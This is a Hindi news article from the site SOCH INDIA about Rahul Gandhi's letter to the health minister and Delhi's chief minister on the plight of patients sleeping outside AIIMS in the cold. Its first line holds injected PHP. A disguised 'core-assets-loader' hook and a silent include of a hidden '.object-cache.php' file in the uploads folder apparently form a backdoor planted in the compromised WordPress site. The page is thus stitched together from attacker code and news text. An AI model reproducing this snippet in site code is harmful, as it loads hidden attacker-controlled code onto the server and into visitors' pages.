add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ‘मैंने देखा कि ठिठुरती ठंड में ये…’, AIIMS में असुविधाओं को लेकर राहुल गांधी का जेपी नड्डा और आतिशी को पत्र – SOCH INDIA
Menu

देश
‘मैंने देखा कि ठिठुरती ठंड में ये…’, AIIMS में असुविधाओं को लेकर राहुल गांधी का जेपी नड्डा और आतिशी को पत्र

nobanner

दिल्ली एम्स की सुविधाओं को लेकर कांग्रेस सांसद और लोकसभा में विपक्ष के नेता राहुल गांधी ने अपनी चिंता जाहिर की है. उन्होंने केंद्रीय स्वास्थ्य मंत्री जेपी नड्डा और दिल्ली की मुख्यमंत्री आतिशी को एक चिट्ठी लिखकर मरीजों और उनके परिवार वालों के लिए बेहतर सुविधा देने की मांग की.

राहुल गांधी ने कहा, “देशभर से दिल्ली AIIMS आने वाले मरीजों और उनके परिवारों को बेहतर सुविधाएं उपलब्ध कराने के लिए दिल्ली की मुख्यमंत्री और केंद्रीय स्वास्थ्य मंत्री को पत्र लिखा है. पिछले दिनों मैंने देखा कि ठिठुरती ठंड में ये मेट्रो स्टेशन के नीचे सोने को मजबूर हैं, जहां न तो पीने के पानी की व्यवस्था है और न शौचालय की. आसपास कूड़े-कचरे का भी ढेर लगा रहता है.”

‘मरीजों को नहीं मिल रही स्वास्थ्य सुविधाएं’

कांग्रेस नेता ने आगे लिखा, “इतनी बड़ी संख्या में मरीजों का दिल्ली AIIMS आना यह भी दिखाता है कि लोग जहां रहते हैं वहां उन्हें सस्ती और अच्छी क्वालिटी की स्वास्थ्य सुविधाएं नहीं मिल रही हैं. मैं उम्मीद करता हूं कि मेरे पत्र का संज्ञान लेते हुए दिल्ली की मुख्यमंत्री और केंद्रीय स्वास्थ्य मंत्री इस मानवीय संकट को हल करने के लिए तत्काल कदम उठाएंगे. साथ ही आशा है कि केंद्र सरकार अगामी बजट में पब्लिक हेल्थकेयर सिस्टम को मज़बूत करने के लिए ठोस पहल करेगी और उसके लिए ज़रूरी संसाधनों को बढ़ाएगी.”

राहुल गांधी कर चुके हैं एम्स और उसके आसपास का दौरा

इससे पहले राहुल गांधी ने एम्स और उसके आसपास के इलाकों का दौरा किया था. इसका उन्होंने वीडियो भी शेयर किया था. उन्होंने कहा था, “एम्स के बाहर नरक. देशभर से आए गरीब मरीज और उनके परिवार एम्स के बाहर ठंड, गंदगी और भूख के बीच सोने को मजबूर हैं. उनके पास न छत है, खाना और न शौचालय और न ही पीने का पानी. बड़े-बड़े दावे करने वाली केंद्र सरकार और दिल्ली सरकार ने इस मानवीय संकट पर आंखें क्यों मूंद ली हैं?”